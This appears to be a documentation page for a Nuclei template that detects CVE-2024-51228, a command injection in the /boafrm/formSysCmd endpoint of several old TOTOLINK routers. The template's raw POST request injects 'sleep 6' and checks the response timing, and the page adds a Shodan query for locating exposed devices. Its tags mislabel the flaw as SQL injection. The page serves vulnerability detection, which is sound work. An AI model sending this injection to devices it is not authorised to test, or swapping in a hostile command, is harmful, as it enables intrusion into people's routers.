Skip to content
Nuclei Templates

TOTOLINK CX-A3002RU - Remote Code Execution

ID: CVE-2024-51228

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2024,totolink,time-based-sqli,sqli

Description

Section titled “Description”

An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.

YAML Source

Section titled “YAML Source”
id: CVE-2024-51228


info:
  name: TOTOLINK CX-A3002RU - Remote Code Execution
  author: DhiyaneshDK
  severity: medium
  description: |
    An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
  reference:
    - https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
    - https://totolink.tw/support_view/A3002RU
    - https://totolink.tw/support_view/N150RT
    - https://www.totolink.tw/products_view/N300RT
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 6.8
    cve-id: CVE-2024-51228
    cwe-id: CWE-78
    epss-score: 0.00046
    epss-percentile: 0.19882
  metadata:
    max-request: 1
    shodan-query: html:"TOTOLINK"
  tags: cve,cve2024,totolink,time-based-sqli,sqli


http:
  - raw:
      - |
        POST /boafrm/formSysCmd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        sysCmd=sleep%206


    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(server,"Boa/0.94")'
          - "status_code == 302"
        condition: and
# digest: 4a0a0047304502205697a690c09819e85ed31f0ff5b99269a20cb7ed60bb4f1b787d4900bf10b9c4022100b9d6ae091f68215bcd303a67573242b6a4b23a14ac8fb0dcca3594ccf46ff656:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-51228.yaml"

View on Github